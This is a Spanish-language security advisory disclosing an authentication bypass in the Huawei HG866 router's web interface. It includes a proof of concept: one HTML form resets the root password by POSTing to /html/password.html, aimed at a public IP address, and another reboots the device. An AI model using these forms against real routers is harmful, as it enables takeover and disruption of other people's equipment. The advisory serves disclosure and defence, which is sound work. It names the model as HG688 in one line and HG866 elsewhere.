Evasión de autenticación en Huawei HG866Evasión de autenticación en Huawei HG866
Resumen
La interfaz de administración web de los routers Huawei HG688 posee páginas vulnerables a falta de validación de sesión, lo que permite la evasión de autenticación de manera local y remota.
Descripción
| Equipment ID: | EchoLife:HG866 |
| Hardware Version: | HG866GTA_VER.C, 01, 02 |
| Software Version: | V1R2C01SPC202, R3.2.4.92sbn - R3.4.2.257sbn, 3FE53864AOCB16 |
| Severidad: | Alta |
| Impacto: | Evasión de autenticación |
| Vector de ataque: | Remoto |
| Solución: | Sin solución |
| Referencia: | CVE no disponible |
El router Huawei HG866 cuenta con interfaz de administración de red vía web, puertos 4FE+2POTS+WIFI+2USB, interfaz óptica GPON, SC/APC.
La interfaz de administración web posee páginas vulnerables a falta de validación de sesión, lo que permite la evasión de autenticación de manera local y remota.
Es posible evadir la autenticación y modificar la contraseña de administrador haciendo una petición directamente a la URL: /html/password.html utilizando el método POST.
POC
<!--Cambia el password de root por password --!> <form name=hg866bypass action=http://187.162.144.50/html/password.html method=post > <input name=psw value=password ><input name=reenterpsw value=password > <input type="submit" name="save" value="Apply" /> </form> <!--Reinicia el dispositivo --!> <form name=hg866dos action=http://192.168.100.251/html/admin_reboot.html" method="post"> <input type=submit name=save id=save value=Reboot /> </form>
Pedro Joaquín
[email protected]
YOUTUBE
TWITTER
FACEBOOK
RSS
CONTÁCTANOS